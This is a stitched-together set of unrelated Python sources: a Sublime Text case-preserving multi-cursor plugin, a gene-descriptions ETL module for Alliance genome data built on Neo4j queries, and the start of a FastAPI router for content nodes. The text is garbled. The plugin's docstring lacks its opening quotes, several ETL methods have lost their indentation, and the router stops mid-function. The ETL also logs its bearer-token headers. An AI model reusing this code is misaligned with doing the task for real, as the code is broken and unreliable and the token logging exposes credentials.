_|_. _ _ | _. _ _
| || | ||<| || |_\
sublime text case-preserved multiple editing
author: <NAME>
contact: <EMAIL>
version: 0.1a
issues:
- undo is not working correctly
- probably destroys all other plugins in its wake
- needs tests and extensive testing
- it will delete your entire file if you sneeze
I accept no responsibility for this plugin destroying your computer etc
'''
import sublime, sublime_plugin, random, string
'''
example:
Spaghetti
spaghetti
spagHetti
SPAGHETTI
we can change all the spaghettis to
Ravioli
ravioli
Ravioli
RAVIOLI
by using the shift-key on the first letter only (note: the third case speciality in this example will be lost)
Plugin is activated when differing cases are detected.
'''
class MultiLineCasePreserveEditCommand(sublime_plugin.TextCommand):
    """TextCommand that rewrites regions to a requested letter case.

    *func_input* is a list of items shaped [[begin, end], transform, diff]
    where transform is one of "lower", "upper" or "mixed"; "mixed"
    regions are left untouched.
    """

    # Dispatch table: transform name -> string method applying it.
    # Replaces duplicated if/elif branches; also removes the bare `None`
    # expression statement that stood in for `pass` in the "mixed" case.
    _CASE_FUNCS = {"lower": str.lower, "upper": str.upper}

    def run(self, edit, func_input=None):
        if not func_input:
            return
        # Walk through each region in the selection
        for item in func_input:
            case_func = self._CASE_FUNCS.get(item[1])
            if case_func is None:
                # "mixed" (or unknown) transform: keep the text as-is.
                continue
            region = sublime.Region(item[0][0], item[0][1])
            text = self.view.substr(region)
            self.view.replace(edit, region, case_func(text))
class MultiLineCasePreservation(sublime_plugin.EventListener):
    """Event listener that remembers the case (lower/upper/mixed) of each
    multi-cursor selection and re-applies it after an edit via the
    multi_line_case_preserve_edit TextCommand.

    NOTE(review): the offset arithmetic in on_modified_async looks
    suspect (see inline notes), and the module docstring itself lists
    undo problems and data loss among known issues.
    """

    def __init__(self):
        # Selections captured (with their case classification) while the
        # user had multiple cursors on non-empty text.
        self.tracked_selections = []
        # Cursor positions from the previous modification event, used to
        # suppress reprocessing an unchanged selection set.
        self.last_selections = []
        print("MultiLineCasePreservationPlugin loaded")

    def process_selections(self, view, selections):
        # Only track genuinely multi-cursor states.
        if(len(selections) > 1):
            self.tracked_selections = selections

    def on_modified_async(self, view):
        # Re-apply per-selection casing after the buffer changed.
        current_startings = []
        current_endings = []
        # get beginning cursor initial_startings
        for v in view.sel():
            current_startings.append(v.a)
            current_endings.append(v.b)
        # now lets get all the cursors, and if we have the same amount of cursors, say hi!
        # if we have not changed since last time, return
        if set(current_startings + current_endings) != set(self.last_selections):
            self.last_selections = current_startings + current_endings
            cursors_len = len(view.sel())
            if (cursors_len == len(self.tracked_selections)):
                # cycle through beginnings and ending regions and convert their case according to tracked selections
                initial_startings = []
                initial_endings = []
                regions = []
                transforms = []
                addings = []
                # get beginning cursor initial_startings
                for s in self.tracked_selections:
                    initial_startings.append(min(s['pos']))
                    initial_endings.append(max(s['pos']))
                    # NOTE(review): selections that were empty get no 'mod'
                    # key in on_selection_modified_async, so s['mod'] could
                    # raise KeyError here — confirm.
                    transforms.append(s['mod'])
                # here is the modifiers
                # NOTE(review): every element appended is the same value
                # (cursor 0's offset); the loop index is unused — confirm
                # whether per-cursor offsets were intended.
                for i in range(len(initial_endings)):
                    addings.append(current_startings[0] - initial_startings[0])
                modifier = 0
                for i in range(len(initial_startings)):
                    original_dist = abs(initial_endings[i] - initial_startings[i])  # original length of this content
                    current_dist = addings[i]  # length of this string from beginning
                    difference = current_dist - original_dist  # difference between the string lengths
                    # NOTE(review): modifier is recomputed (not accumulated)
                    # each iteration — verify this matches the intended shift.
                    modifier = difference * (i)
                    regions.append([[initial_startings[i] + modifier, current_endings[i]], transforms[i], difference])
                # place modifications into the editor via TextCommand (have no other way in ST3)
                # only run this if we have multiple cases
                transform_set = set(transforms)
                if len(transform_set) > 1:
                    view.run_command('multi_line_case_preserve_edit', {"func_input": regions} )

    def on_selection_modified_async(self, view):
        # Classify each selection's case and remember the set.
        if len(view.sel()) > 1:
            current_selections = []
            for s in view.sel():
                r = {}
                r['pos'] = (s.a, s.b)
                region = s
                text = view.substr(region)
                if(text):
                    if text.islower():
                        r['mod'] = 'lower'
                    elif text.isupper():
                        r['mod'] = 'upper'
                    else:
                        r['mod'] = 'mixed'
                current_selections.append(r)
            # now, we have all our selections.
            self.process_selections(view, current_selections)
        else:
            # Back to a single cursor: stop tracking.
            if(len(self.tracked_selections) > 1):
                self.tracked_selections = []
"""Gene Descriptions ETL."""
import copy
import logging
import os
import datetime
import re
import requests
from collections import defaultdict
from etl import ETL
from etl.helpers import Neo4jHelper
from genedescriptions.config_parser import GenedescConfigParser
from genedescriptions.descriptions_writer import DescriptionsWriter
from genedescriptions.gene_description import GeneDescription
from genedescriptions.data_manager import DataManager
from genedescriptions.commons import DataType, Gene
from genedescriptions.precanned_modules import set_gene_ontology_module, set_disease_module, \
set_alliance_human_orthology_module,\
set_expression_module
from ontobio import AssociationSetFactory, Ontology
from transactors import CSVTransactor, Neo4jTransactor
from loader_common import ContextInfo
from data_manager import DataFileManager
from generators.header import create_header
# Maps a MOD data-provider code to the anatomy-ontology prefix used for
# its expression data in Neo4j.
EXPRESSION_PRVD_SUBTYPE_MAP = {'WB': 'WBBT', 'ZFIN': 'ZFA', 'FB': 'FBBT', 'MGI': 'EMAPA'}
class GeneDescriptionsETL(ETL):
    """Gene Descriptions ETL.

    Generates automated gene descriptions for each MOD, writes them to
    Neo4j, and produces the per-MOD report files.
    """

    logger = logging.getLogger(__name__)

    # Query templates which take params and will be processed later
    # Stores each generated description onto its gene node.
    gene_descriptions_query_template = """
        USING PERIODIC COMMIT %s
        LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
        MATCH (o:Gene)
        WHERE o.primaryKey = row.genePrimaryKey
        SET o.automatedGeneSynopsis = row.geneDescription"""

    # Querys which do not take params and can be used as is
    # Non-human genes of a data provider.
    get_all_genes_query = """
        MATCH (g:Gene)
        WHERE g.dataProvider = {parameter} AND NOT g.primaryKey CONTAINS "HGNC:"
        RETURN g.primaryKey, g.symbol"""

    # Human genes (HGNC-keyed) of a data provider.
    get_all_genes_human_query = """
        MATCH (g:Gene)
        WHERE g.dataProvider = {parameter} AND g.primaryKey CONTAINS "HGNC:"
        RETURN g.primaryKey, g.symbol"""

    # Direct gene-disease annotations with their evidence codes.
    get_gene_disease_annot_query = """
        MATCH (d:DOTerm:Ontology)-[r:IS_MARKER_FOR|IS_IMPLICATED_IN|IS_MODEL_OF]-(g:Gene)-[:ASSOCIATION]->
              (dga:Association:DiseaseEntityJoin)-[:ASSOCIATION]->(d)
        WHERE g.dataProvider = {parameter}
        MATCH (dga)-[:EVIDENCE]->(pec:PublicationJoin)-[:ASSOCIATION]-(e:ECOTerm)
        RETURN DISTINCT g.primaryKey AS geneId,
               g.symbol AS geneSymbol,
               d.primaryKey AS TermId,
               e.primaryKey AS ECode,
               type(r) AS relType,
               'D' AS aspect"""

    # Allele-level disease annotations, joined back to the allele's gene.
    get_feature_disease_annot_query = """
        MATCH (d:DOTerm:Ontology)-[r:IS_MARKER_FOR|IS_IMPLICATED_IN|IS_MODEL_OF]-(f)-[:ASSOCIATION]->
              (dga:Association:DiseaseEntityJoin)-[:ASSOCIATION]->(d)
        WHERE f.dataProvider = {parameter}
        MATCH (f)<-[:IS_ALLELE_OF]->(g:Gene)
        MATCH (dga)-[:EVIDENCE]->(pec:PublicationJoin)-[:ASSOCIATION]-(e:ECOTerm)
        RETURN DISTINCT g.primaryKey AS geneId,
               g.symbol AS geneSymbol,
               f.primaryKey as alleleId,
               d.primaryKey as TermId,
               e.primaryKey AS ECode,
               type(r) AS relType,
               'D' AS aspect"""

    # Stringent-filter human orthologs with the algorithms that matched them.
    get_filtered_human_orthologs_query = """
        MATCH (g2)<-[orth:ORTHOLOGOUS]-(g:Gene)-[:ASSOCIATION]->(ogj:Association:OrthologyGeneJoin)-[:ASSOCIATION]->
              (g2:Gene)
        WHERE ogj.joinType = 'orthologous' AND g.dataProvider = {parameter} AND g2.taxonId ='NCBITaxon:9606' AND
              orth.strictFilter = true
        MATCH (ogj)-[:MATCHED]->(oa:OrthoAlgorithm)
        RETURN g.primaryKey AS geneId,
               g2.primaryKey AS orthoId,
               g2.symbol AS orthoSymbol,
               g2.name AS orthoName,
               oa.name AS algorithm"""

    # Disease annotations inferred from human orthologs.
    get_disease_via_orthology_query = """
        MATCH (d:DOTerm:Ontology)-[r:IMPLICATED_VIA_ORTHOLOGY]-(g:Gene)-[:ASSOCIATION]->
              (dga:Association:DiseaseEntityJoin)-[:ASSOCIATION]->(d)
        WHERE g.dataProvider = {parameter}
        MATCH (dga)-[:FROM_ORTHOLOGOUS_GENE]-(orthGene:Gene)
        WHERE orthGene.taxonId = 'NCBITaxon:9606'
        RETURN DISTINCT g.primaryKey AS geneId,
               g.symbol AS geneSymbol,
               d.primaryKey AS TermId"""

    # IS_A / PART_OF term pairs of a given ontology (prefix filled via format()).
    get_ontology_pairs_query = """
        MATCH (term1:{}Term:Ontology)-[r:IS_A|PART_OF]->(term2:{}Term:Ontology)
        RETURN term1.primaryKey,
               term1.name,
               term1.type,
               term1.isObsolete,
               term2.primaryKey,
               term2.name,
               term2.type,
               term2.isObsolete,
               type(r) AS rel_type"""

    # Gene expression annotations to anatomy terms.
    get_expression_annotations_query = """
        MATCH (g:Gene)-[EXPRESSED_IN]->(:ExpressionBioEntity)-[:ANATOMICAL_STRUCTURE|ANATOMICAL_SUB_STRUCTURE]->(t:Ontology)-[:IS_A|PART_OF]->(t2:Ontology)
        WHERE g.dataProvider = {parameter}
        RETURN g.primaryKey AS geneId,
               g.symbol AS geneSymbol,
               t.primaryKey AS TermId,
               'EXP' AS relType,
               'A' AS aspect"""
    def __init__(self, config):
        """Initialise object."""
        super().__init__()
        # DataTypeConfig describing the MOD sub-types to process.
        self.data_type_config = config
        # Run date stamp (YYYYMMDD) used in report file names.
        self.cur_date = datetime.date.today().strftime("%Y%m%d")
    def _load_and_process_data(self):
        """Generate gene descriptions for every configured MOD and load them.

        Builds a genedescriptions DataManager with the GO/DO (and, where
        available, expression) ontologies and annotations, generates the
        descriptions per MOD, saves them to CSV for Neo4j ingestion and
        writes the per-MOD report files.
        """
        # create gene descriptions data manager and load common data
        context_info = ContextInfo()
        data_manager = DataFileManager(context_info.config_file_location)
        # go_onto_config = data_manager.get_config('GO')
        go_annot_config = data_manager.get_config('GAF')
        # do_onto_config = data_manager.get_config('DOID')
        # Index the GAF sub-type configs by their data-provider (MOD) code.
        go_annot_sub_dict = {sub.get_data_provider(): sub for sub in go_annot_config.get_sub_type_objects()}
        this_dir = os.path.split(__file__)[0]
        gd_config = GenedescConfigParser(os.path.join(this_dir,
                                                      os.pardir,
                                                      os.pardir,
                                                      "gene_descriptions.yml"))
        gd_data_manager = DataManager(do_relations=None, go_relations=["subClassOf", "BFO:0000050"])
        gd_data_manager.set_ontology(ontology_type=DataType.GO,
                                     ontology=self.get_ontology(data_type=DataType.GO),
                                     config=gd_config)
        gd_data_manager.set_ontology(ontology_type=DataType.DO,
                                     ontology=self.get_ontology(data_type=DataType.DO),
                                     config=gd_config)
        # generate descriptions for each MOD
        for prvdr in [sub_type.get_data_provider().upper()
                      for sub_type in self.data_type_config.get_sub_type_objects()]:
            # Per-MOD copy so MOD-specific tweaks do not leak between runs.
            gd_config_mod_specific = copy.deepcopy(gd_config)
            if prvdr == "WB":
                gd_config_mod_specific.config["expression_sentences_options"][
                    "remove_children_if_parent_is_present"] = True
            self.logger.info("Generating gene descriptions for %s", prvdr)
            # Human genes are stored under the RGD data provider.
            data_provider = prvdr if prvdr != "HUMAN" else "RGD"
            json_desc_writer = DescriptionsWriter()
            go_annot_path = "file://" + os.path.join(os.getcwd(),
                                                     "tmp",
                                                     go_annot_sub_dict[prvdr].file_to_download)
            gd_data_manager.load_associations_from_file(
                associations_type=DataType.GO, associations_url=go_annot_path,
                associations_cache_path=os.path.join(os.getcwd(),
                                                     "tmp",
                                                     "gd_cache",
                                                     "go_annot_" + prvdr + ".gaf"),
                config=gd_config_mod_specific)
            gd_data_manager.set_associations(associations_type=DataType.DO,
                                             associations=self.get_disease_annotations_from_db(
                                                 data_provider=data_provider,
                                                 gd_data_manager=gd_data_manager,
                                                 logger=self.logger),
                                             config=gd_config_mod_specific)
            # Expression data exists only for providers with a mapped anatomy ontology.
            if prvdr in EXPRESSION_PRVD_SUBTYPE_MAP:
                gd_data_manager.set_ontology(ontology_type=DataType.EXPR,
                                             ontology=self.get_ontology(data_type=DataType.EXPR,
                                                                        provider=prvdr),
                                             config=gd_config_mod_specific)
                gd_data_manager.set_associations(
                    associations_type=DataType.EXPR,
                    associations=self.get_expression_annotations_from_db(data_provider=data_provider,
                                                                         gd_data_manager=gd_data_manager,
                                                                         logger=self.logger),
                    config=gd_config_mod_specific)
            commit_size = self.data_type_config.get_neo4j_commit_size()
            generators = self.get_generators(prvdr,
                                             gd_data_manager,
                                             gd_config_mod_specific,
                                             json_desc_writer)
            query_template_list = [
                [self.gene_descriptions_query_template, commit_size,
                 "genedescriptions_data_" + prvdr + ".csv"]
            ]
            query_and_file_list = self.process_query_params(query_template_list)
            CSVTransactor.save_file_static(generators, query_and_file_list)
            Neo4jTransactor.execute_query_batch(query_and_file_list)
            self.error_messages()
            self.save_descriptions_report_files(data_provider=prvdr,
                                                json_desc_writer=json_desc_writer,
                                                context_info=context_info,
                                                gd_data_manager=gd_data_manager)
    def get_generators(self, data_provider, gd_data_manager, gd_config, json_desc_writer):
        """Create generators.

        Yields a single list of {genePrimaryKey, geneDescription} dicts
        for every gene of *data_provider* that receives a non-empty
        description; per-gene stats are recorded in *json_desc_writer*.
        """
        gene_prefix = ""
        if data_provider == "HUMAN":
            # Human genes live under the RGD provider with HGNC primary keys.
            return_set = Neo4jHelper.run_single_parameter_query(self.get_all_genes_human_query,
                                                                "RGD")
            gene_prefix = "RGD:"
        else:
            return_set = Neo4jHelper.run_single_parameter_query(self.get_all_genes_query,
                                                                data_provider)
        descriptions = []
        best_orthologs = self.get_best_orthologs_from_db(data_provider=data_provider)
        for record in return_set:
            gene = Gene(id=gene_prefix + record["g.primaryKey"],
                        name=record["g.symbol"],
                        dead=False,
                        pseudo=False)
            gene_desc = GeneDescription(gene_id=record["g.primaryKey"],
                                        gene_name=gene.name,
                                        add_gene_name=False,
                                        config=gd_config)
            # Assemble the description from the pre-canned sentence modules.
            set_gene_ontology_module(dm=gd_data_manager,
                                     conf_parser=gd_config,
                                     gene_desc=gene_desc, gene=gene)
            set_expression_module(df=gd_data_manager,
                                  conf_parser=gd_config,
                                  gene_desc=gene_desc,
                                  gene=gene)
            set_disease_module(df=gd_data_manager,
                               conf_parser=gd_config,
                               gene_desc=gene_desc,
                               gene=gene,
                               human=data_provider == "HUMAN")
            if gene.id in best_orthologs:
                gene_desc.stats.set_best_orthologs = best_orthologs[gene.id][0]
                set_alliance_human_orthology_module(orthologs=best_orthologs[gene.id][0],
                                                    excluded_orthologs=best_orthologs[gene.id][1],
                                                    gene_desc=gene_desc,
                                                    config=gd_config)
            if gene_desc.description:
                descriptions.append({
                    "genePrimaryKey": gene_desc.gene_id,
                    "geneDescription": gene_desc.description
                })
            json_desc_writer.add_gene_desc(gene_desc)
        yield [descriptions]
def get_ontology(self, data_type: DataType, provider=None):
"""Get Ontology."""
ontology = Ontology()
terms_pairs = []
if data_type == DataType.GO:
terms_pairs = Neo4jHelper.run_single_parameter_query(
self.get_ontology_pairs_query.format("GO", "GO"),
None)
elif data_type == DataType.DO:
terms_pairs = Neo4jHelper.run_single_parameter_query(
self.get_ontology_pairs_query.format("DO", "DO"),
None)
elif data_type == DataType.EXPR:
if provider in EXPRESSION_PRVD_SUBTYPE_MAP:
terms_pairs = Neo4jHelper.run_single_parameter_query(
self.get_ontology_pairs_query.format(EXPRESSION_PRVD_SUBTYPE_MAP[provider],
EXPRESSION_PRVD_SUBTYPE_MAP[provider]),
None)
for terms_pair in terms_pairs:
self.add_neo_term_to_ontobio_ontology_if_not_exists(
terms_pair["term1.primaryKey"], terms_pair["term1.name"], terms_pair["term1.type"],
terms_pair["term1.isObsolete"], ontology)
self.add_neo_term_to_ontobio_ontology_if_not_exists(
terms_pair["term2.primaryKey"], terms_pair["term2.name"], terms_pair["term2.type"],
terms_pair["term2.isObsolete"], ontology)
ontology.add_parent(terms_pair["term1.primaryKey"], terms_pair["term2.primaryKey"],
relation="subClassOf" if terms_pair["rel_type"] == "IS_A" else "BFO:0000050")
if data_type == DataType.EXPR and provider == "MGI":
self.add_neo_term_to_ontobio_ontology_if_not_exists("EMAPA_ARTIFICIAL_NODE:99999",
"embryo",
"anatomical_structure",
False,
ontology)
ontology.add_parent("EMAPA_ARTIFICIAL_NODE:99999", "EMAPA:0", relation="subClassOf")
self.add_neo_term_to_ontobio_ontology_if_not_exists("EMAPA_ARTIFICIAL_NODE:99998",
"head",
"anatomical_structure",
False,
ontology)
ontology.add_parent("EMAPA_ARTIFICIAL_NODE:99998", "EMAPA:0", relation="subClassOf")
GeneDescriptionsETL.add_neo_term_to_ontobio_ontology_if_not_exists(
"EMAPA_ARTIFICIAL_NODE:99997",
"gland",
"anatomical_structure",
False,
ontology)
ontology.add_parent("EMAPA_ARTIFICIAL_NODE:99997", "EMAPA:0", relation="subClassOf")
elif data_type == DataType.EXPR and provider == "FB":
GeneDescriptionsETL.add_neo_term_to_ontobio_ontology_if_not_exists(
"FBbt_ARTIFICIAL_NODE:99999",
"organism",
"",
False,
ontology)
ontology.add_parent("FBbt_ARTIFICIAL_NODE:99999",
"FBbt:10000000",
relation="subClassOf")
return ontology
@staticmethod
def add_neo_term_to_ontobio_ontology_if_not_exists(term_id, term_label,
term_type, is_obsolete, ontology):
"""Add NEO Term to Ontobio Ontology If Not Exists."""
if not ontology.has_node(term_id) and term_label:
if is_obsolete in ["true", "True"]:
meta = {"deprecated": True, "basicPropertyValues": [
{"pred": "OIO:hasOBONamespace", "val": term_type}]}
else:
meta = {"basicPropertyValues": [
{"pred": "OIO:hasOBONamespace", "val": term_type}]}
ontology.add_node(id=term_id, label=term_label, meta=meta)
@staticmethod
def create_annotation_record(gene_id, gene_symbol, term_id, aspect, ecode, prvdr, qualifier):
"""Create Annotation Record."""
return {"source_line": "",
"subject": {
"id": gene_id,
"label": gene_symbol,
"type": "gene",
"fullname": "",
"synonyms": [],
"taxon": {"id": ""}
},
"object": {
"id": term_id,
"taxon": ""
},
"qualifiers": [qualifier],
"aspect": aspect,
"relation": {"id": None},
"negated": False,
"evidence": {
"type": ecode,
"has_supporting_reference": "",
"with_support_from": [],
"provided_by": prvdr,
"date": None
}}
    @staticmethod
    def add_annotations(final_annotation_set, neo4j_annot_set, data_provider,
                        data_type: DataType, logger, ontology=None):
        """Convert Neo4j annotation rows into ontobio-style records.

        Appends one record per evidence code to *final_annotation_set*
        (mutated in place). For expression annotations some broad terms
        are remapped to artificial nodes (see get_ontology) and any
        '* stage conceptus' term is collapsed to 'early conceptus'.
        *ontology* is only used for DataType.EXPR.
        """
        early_conceptus_re = re.compile(r'.*stage conceptus$')
        qualifier = ""
        for annot in neo4j_annot_set:
            if data_type == DataType.DO:
                # Marker associations get the biomarker evidence code.
                ecodes = ["EXP"] if annot["relType"] != "IS_MARKER_FOR" else ["BMK"]
            elif data_type == DataType.EXPR:
                ecodes = ["EXP"]
                qualifier = "Verified"
                # map direct annotations to 'embryo' in mouse or 'organism'
                # in fly to a new 'artificial' node to keep
                # them but avoid 'embryo' and 'organism' as common ancestors at the same time
                if annot["TermId"] == "EMAPA:16039":
                    # Shallow-copy the record before mutating it.
                    annot = {key: value for key, value in annot.items()}
                    annot["TermId"] = "EMAPA_ARTIFICIAL_NODE:99999"
                elif annot["TermId"] == "EMAPA:31858":
                    annot = {key: value for key, value in annot.items()}
                    annot["TermId"] = "EMAPA_ARTIFICIAL_NODE:99998"
                elif annot["TermId"] == "EMAPA:18425":
                    annot = {key: value for key, value in annot.items()}
                    annot["TermId"] = "EMAPA_ARTIFICIAL_NODE:99997"
                elif annot["TermId"] == "FBbt:00000001":
                    annot = {key: value for key, value in annot.items()}
                    annot["TermId"] = "FBbt_ARTIFICIAL_NODE:99999"
                # map all annotations to '* stage conceptus' to 'early conceptus'
                # NOTE(review): ontology.label() could return None for an
                # unknown term, which would make match() raise — confirm inputs.
                if early_conceptus_re.match(ontology.label(annot["TermId"])):
                    annot = {key: value for key, value in annot.items()}
                    annot["TermId"] = "EMAPA:36473"
            else:
                ecodes = [annot["ECode"]]
            for ecode in ecodes:
                logger.debug(ecode)
                # HGNC-keyed (human) genes are re-prefixed with RGD:.
                final_annotation_set.append(GeneDescriptionsETL.create_annotation_record(
                    annot["geneId"]
                    if not annot["geneId"].startswith("HGNC:") else "RGD:" + annot["geneId"],
                    annot["geneSymbol"],
                    annot["TermId"],
                    annot["aspect"],
                    ecode,
                    data_provider,
                    qualifier))
    @staticmethod
    def get_disease_annotations_from_db(data_provider, gd_data_manager, logger):
        """Get Disease Annotations From DB.

        Collects gene-level, allele-level (restricted to alleles related
        to exactly one gene) and orthology-derived disease annotations
        for *data_provider* and returns them as an ontobio
        AssociationSet built on the DO ontology.
        """
        annotations = []
        gene_annot_set = Neo4jHelper.run_single_parameter_query(
            GeneDescriptionsETL.get_gene_disease_annot_query,
            data_provider)
        GeneDescriptionsETL.add_annotations(annotations,
                                            gene_annot_set,
                                            data_provider,
                                            DataType.DO,
                                            logger)
        feature_annot_set = Neo4jHelper.run_single_parameter_query(
            GeneDescriptionsETL.get_feature_disease_annot_query,
            data_provider)
        # Group allele annotations by (allele, term), keeping one entry per
        # distinct gene. annot[0] is positional access to the record's first
        # returned column (geneId) — presumably a Neo4j record; verify.
        allele_do_annot = defaultdict(list)
        for feature_annot in feature_annot_set:
            if all([feature_annot["geneId"] != annot[0]
                    for annot in allele_do_annot[(feature_annot["alleleId"],
                                                  feature_annot["TermId"])]]):
                allele_do_annot[(feature_annot["alleleId"],
                                 feature_annot["TermId"])].append(feature_annot)
        # keep only disease annotations through simple entities
        # (e.g., alleles related to one gene only)
        feature_annot_set = [feature_annots[0] for feature_annots in allele_do_annot.values() if
                             len(feature_annots) == 1]
        GeneDescriptionsETL.add_annotations(annotations,
                                            feature_annot_set,
                                            data_provider,
                                            DataType.DO,
                                            logger)
        disease_via_orth_records = Neo4jHelper.run_single_parameter_query(
            GeneDescriptionsETL.get_disease_via_orthology_query, data_provider)
        # Orthology-derived annotations get the DVO evidence code.
        for orth_annot in disease_via_orth_records:
            annotations.append(GeneDescriptionsETL.create_annotation_record(
                gene_id=orth_annot["geneId"],
                gene_symbol=orth_annot["geneSymbol"],
                term_id=orth_annot["TermId"],
                aspect="D",
                ecode="DVO",
                prvdr=data_provider,
                qualifier=""))
        return AssociationSetFactory().create_from_assocs(assocs=list(annotations),
                                                          ontology=gd_data_manager.do_ontology)
@staticmethod
def get_expression_annotations_from_db(data_provider, gd_data_manager, logger):
"""Get Expression Annotations From DB."""
annotations = []
gene_annot_set = Neo4jHelper.run_single_parameter_query(
GeneDescriptionsETL.get_expression_annotations_query,
data_provider)
GeneDescriptionsETL.add_annotations(annotations,
gene_annot_set,
data_provider,
DataType.EXPR,
logger,
gd_data_manager.expression_ontology)
return AssociationSetFactory().create_from_assocs(
assocs=list(annotations),
ontology=gd_data_manager.expression_ontology)
@staticmethod
def get_best_orthologs_from_db(data_provider):
"""Get Best Orthologs_from_db."""
orthologs_set = Neo4jHelper.run_single_parameter_query(
GeneDescriptionsETL.get_filtered_human_orthologs_query,
data_provider)
genes_orthologs_algos = defaultdict(lambda: defaultdict(int))
best_orthologs = {}
orthologs_info = {}
for ortholog_algo in orthologs_set:
genes_orthologs_algos[ortholog_algo["geneId"]][ortholog_algo["orthoId"]] += 1
if ortholog_algo["orthoId"] not in orthologs_info:
orthologs_info[ortholog_algo["orthoId"]] = (ortholog_algo["orthoSymbol"],
ortholog_algo["orthoName"])
for gene_id in genes_orthologs_algos.keys():
best_orthologs[gene_id] = [[[ortholog_id,
orthologs_info[ortholog_id][0],
orthologs_info[ortholog_id][1]]
for ortholog_id in genes_orthologs_algos[gene_id].keys() if
genes_orthologs_algos[gene_id][ortholog_id] ==
max(genes_orthologs_algos[gene_id].values())], False]
best_orthologs[gene_id][-1] \
= len(best_orthologs[gene_id][0]) != len(genes_orthologs_algos[gene_id].keys())
return best_orthologs
    @staticmethod
    def upload_files_to_fms(file_path, context_info, data_provider, logger):
        """Upload the generated description files (json/txt/tsv) to the FMS.

        When GENERATE_REPORTS is enabled all three formats are submitted;
        otherwise only the JSON file is uploaded under a TEST data type.
        """
        with open(file_path + ".json", 'rb') as f_json, \
                open(file_path + ".txt", 'rb') as f_txt, \
                open(file_path + ".tsv", 'rb') as f_tsv:
            if context_info.env["GENERATE_REPORTS"] is True:
                file_to_upload = {
                    f"{context_info.env['ALLIANCE_RELEASE']}_GENE-DESCRIPTION-JSON_{data_provider}": f_json,
                    f"{context_info.env['ALLIANCE_RELEASE']}_GENE-DESCRIPTION-TXT_{data_provider}": f_txt,
                    f"{context_info.env['ALLIANCE_RELEASE']}_GENE-DESCRIPTION-TSV_{data_provider}": f_tsv}
            else:
                file_to_upload = {
                    f"{context_info.env['ALLIANCE_RELEASE']}_GENE-DESCRIPTION-TEST-JSON_{data_provider}": f_json}
            headers = {
                'Authorization': 'Bearer {}'.format(context_info.env['API_KEY'])
            }
            logger.debug(file_to_upload)
            logger.debug(headers)
            logger.debug('Uploading gene description files to FMS %s',
                         context_info.env['FMS_API_URL'])
            response = requests.post(context_info.env['FMS_API_URL'] + '/api/data/submit',
                                     files=file_to_upload,
                                     headers=headers)
            logger.info(response.text)
    def save_descriptions_report_files(self, data_provider, json_desc_writer, context_info, gd_data_manager):
        """Save the descriptions report files (json, txt, tsv).

        Writes the per-MOD report files under tmp/, prepends a standard
        Alliance header to the txt/tsv outputs and, when GENERATE_REPORTS
        is set, uploads everything to the FMS.
        """
        # Release version is the first two components (e.g. "3.1" of "3.1.0").
        release_version = ".".join(context_info.env["ALLIANCE_RELEASE"].split(".")[0:2])
        json_desc_writer.overall_properties.species = data_provider
        json_desc_writer.overall_properties.release_version = release_version
        json_desc_writer.overall_properties.date = self.cur_date
        file_name = self.cur_date + "_" + data_provider
        file_path = os.path.join("tmp", file_name)
        json_desc_writer.write_json(file_path=file_path + ".json",
                                    pretty=True,
                                    include_single_gene_stats=True,
                                    data_manager=gd_data_manager)
        json_desc_writer.write_plain_text(file_path=file_path + ".txt")
        readme = "This file contains the following fields: gene ID, gene name, and gene description. The gene " \
                 "descriptions are generated by an algorithm developed by the Alliance that uses highly structured " \
                 "gene data such as associations to various ontology terms (e.g., Gene Ontology terms) and the " \
                 "Alliance strict orthology set. The original set of ontology terms that a gene is annotated to may " \
                 "have been trimmed to an ancestor term in the ontology, in order to balance readability with the " \
                 "amount of information in the description. The complete set of annotations to any gene in this file " \
                 "may be found in the relevant data tables on the Alliance gene page."
        species = self.etlh.species_lookup_by_data_provider(data_provider)
        taxon_id = self.etlh.get_taxon_from_mod(data_provider)
        header = create_header(file_type='Gene Descriptions', database_version=context_info.env["ALLIANCE_RELEASE"],
                               data_format='txt', readme=readme, species=species, taxon_ids='# TaxonIDs:NCBITaxon:' +
                               taxon_id)
        # Drop blank lines from the generated header before prepending it.
        header = "\n".join([line.strip() for line in header.splitlines() if len(line.strip()) != 0])
        self.add_header_to_file(file_path=file_path + ".txt", header=header)
        json_desc_writer.write_tsv(file_path=file_path + ".tsv")
        header = create_header(file_type='Gene Descriptions', database_version=context_info.env["ALLIANCE_RELEASE"],
                               data_format='tsv', readme=readme, species=species, taxon_ids='# TaxonIDs:NCBITaxon:' +
                               taxon_id)
        header = "\n".join([line.strip() for line in header.splitlines() if len(line.strip()) != 0])
        self.add_header_to_file(file_path=file_path + ".tsv", header=header)
        if context_info.env["GENERATE_REPORTS"]:
            self.upload_files_to_fms(file_path, context_info, data_provider, self.logger)
@staticmethod
def add_header_to_file(file_path, header):
"""Add header to file."""
with open(file_path, 'r') as original:
data = original.read()
with open(file_path, 'w') as modified:
modified.write(header + "\n\n" + data)
|
from typing import Optional
from typing import List
from fastapi import APIRouter, Depends, Body
from models import User, Content, Node, Group, ExternalContent
from routers import get_current_user, admin_only
from schemas import NodeAdd, NodeEdit, NodeFind
#
router = APIRouter()
@router.post("/push_content")
async def push_content(node_id: str = Body(..., embed=True), content_id: str = Body(..., embed=True),
                       admin: User = Depends(admin_only)):
    """Add a content reference to a node's `contents` set (admin only)."""
    assert admin is not None
    updated_node = await Node.find_one_and_add_to_set(
        find={"id": node_id},
        data={"contents": Content.ref(content_id)},
    )
    return updated_node.export()
@router.post("/pull_content")
async def pull_content(node_id: str = Body(..., embed=True), content_id: str = Body(..., embed=True),
                       admin: User = Depends(admin_only)):
    """Remove a content reference from a node's `contents` set (admin only)."""
    assert admin is not None
    updated_node = await Node.find_one_and_pull(
        find={"id": node_id},
        data={"contents": Content.ref(content_id)},
    )
    return updated_node.export()
@router.post("/push_external_content")
async def push_external_content(node_id: str = Body(..., embed=True), external_content_id: str = Body(..., embed=True),
                                admin: User = Depends(admin_only)):
    """Add an external-content reference to a node (admin only)."""
    assert admin is not None
    updated_node = await Node.find_one_and_add_to_set(
        find={"id": node_id},
        data={"external_contents": ExternalContent.ref(external_content_id)},
    )
    return updated_node.export()
@router.post("/pull_external_content")
async def pull_external_content(node_id: str = Body(..., embed=True), external_content_id: str = Body(..., embed=True),
                                admin: User = Depends(admin_only)):
    """Remove an external-content reference from a node (admin only)."""
    assert admin is not None
    updated_node = await Node.find_one_and_pull(
        find={"id": node_id},
        data={"external_contents": ExternalContent.ref(external_content_id)},
    )
    return updated_node.export()
@router.get("/current")
async def current_nodes(current_user: User = Depends(get_current_user)):
    """Return the nodes reachable by the current user via group membership."""
    member_groups = await Group.find({"members": current_user})
